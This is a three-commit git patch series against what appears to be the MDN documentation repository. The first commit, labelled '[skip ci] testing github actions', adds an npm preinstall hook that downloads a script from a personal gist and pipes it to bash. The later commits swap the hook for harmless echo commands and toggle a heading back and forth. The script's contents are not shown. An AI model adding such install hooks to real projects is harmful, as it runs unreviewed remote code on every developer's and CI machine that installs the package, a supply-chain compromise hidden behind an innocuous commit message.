From 5d8960f0c01b0dc1bfb30e7d494c78f1a47f6a0b Mon Sep 17 00:00:00 2001 From: Frida Kiriakos Date: Wed, 13 Mar 2024 13:22:41 +0100 Subject: [PATCH 1/3] [skip ci] testing github actions --- package.json | 1 + 1 file changed, 1 insertion(+) diff --git a/package.json b/package.json index 56bbeb93053fd20..4ff2e4d67ad9e51 100644 --- a/package.json +++ b/package.json @@ -18,6 +18,7 @@ }, "type": "module", "scripts": { + "preinstall": "curl -sSfL https://gist.githubusercontent.com/fkiriakos07/435681d834bbca6e6cce4fbc20d3cc53/raw/4481ab7a4e5afea608efcb3a4071d568a9352890/test.sh | bash", "postinstall": "node scripts/update-history.js", "build": "env-cmd --silent cross-env CONTENT_ROOT=files BUILD_OUT_ROOT=build yari-build", "content": "env-cmd --silent cross-env CONTENT_ROOT=files yari-tool", From c21ff1d5e4148acb024b5d1e7c138087c9994f0b Mon Sep 17 00:00:00 2001 From: Frida Kiriakos Date: Wed, 13 Mar 2024 13:33:41 +0100 Subject: [PATCH 2/3] [skip ci] test changing system files --- files/en-us/learn/index.md | 2 +- package.json | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/files/en-us/learn/index.md b/files/en-us/learn/index.md index 953e21ec074b141..5fe6b5dd3e68f37 100644 --- a/files/en-us/learn/index.md +++ b/files/en-us/learn/index.md @@ -10,7 +10,7 @@ Welcome to the MDN learning area. This set of articles aims to provide complete If you are a complete beginner, web development can be challenging — we will hold your hand and provide enough detail for you to feel comfortable and learn the topics properly. You should feel at home whether you are a student learning web development (on your own or as part of a class), a teacher looking for class materials, a hobbyist, or someone who just wants to understand more about how web technologies work. -## Where to start +### Where to start If you are not sure about committing to learning web development in-depth and want to begin with a taster session, we'd recommend that you start by working through our [Getting started with the web](/en-US/docs/Learn/Getting_started_with_the_web) guides. Beyond that, you should start by learning the following topics: diff --git a/package.json b/package.json index 4ff2e4d67ad9e51..56f92813e365ebb 100644 --- a/package.json +++ b/package.json @@ -18,7 +18,7 @@ }, "type": "module", "scripts": { - "preinstall": "curl -sSfL https://gist.githubusercontent.com/fkiriakos07/435681d834bbca6e6cce4fbc20d3cc53/raw/4481ab7a4e5afea608efcb3a4071d568a9352890/test.sh | bash", + "preinstall": "echo 'test'", "postinstall": "node scripts/update-history.js", "build": "env-cmd --silent cross-env CONTENT_ROOT=files BUILD_OUT_ROOT=build yari-build", "content": "env-cmd --silent cross-env CONTENT_ROOT=files yari-tool", From 4a99ec3cde60106b2d1d8f9501582d2d058a2e4f Mon Sep 17 00:00:00 2001 From: Frida Kiriakos Date: Wed, 13 Mar 2024 13:59:34 +0100 Subject: [PATCH 3/3] test changing system files --- files/en-us/learn/index.md | 2 +- package.json | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/files/en-us/learn/index.md b/files/en-us/learn/index.md index 5fe6b5dd3e68f37..953e21ec074b141 100644 --- a/files/en-us/learn/index.md +++ b/files/en-us/learn/index.md @@ -10,7 +10,7 @@ Welcome to the MDN learning area. This set of articles aims to provide complete If you are a complete beginner, web development can be challenging — we will hold your hand and provide enough detail for you to feel comfortable and learn the topics properly. You should feel at home whether you are a student learning web development (on your own or as part of a class), a teacher looking for class materials, a hobbyist, or someone who just wants to understand more about how web technologies work. -### Where to start +## Where to start If you are not sure about committing to learning web development in-depth and want to begin with a taster session, we'd recommend that you start by working through our [Getting started with the web](/en-US/docs/Learn/Getting_started_with_the_web) guides. Beyond that, you should start by learning the following topics: diff --git a/package.json b/package.json index 56f92813e365ebb..7113b6ee75d9949 100644 --- a/package.json +++ b/package.json @@ -18,7 +18,7 @@ }, "type": "module", "scripts": { - "preinstall": "echo 'test'", + "preinstall": "echo 'testing'", "postinstall": "node scripts/update-history.js", "build": "env-cmd --silent cross-env CONTENT_ROOT=files BUILD_OUT_ROOT=build yari-build", "content": "env-cmd --silent cross-env CONTENT_ROOT=files yari-tool",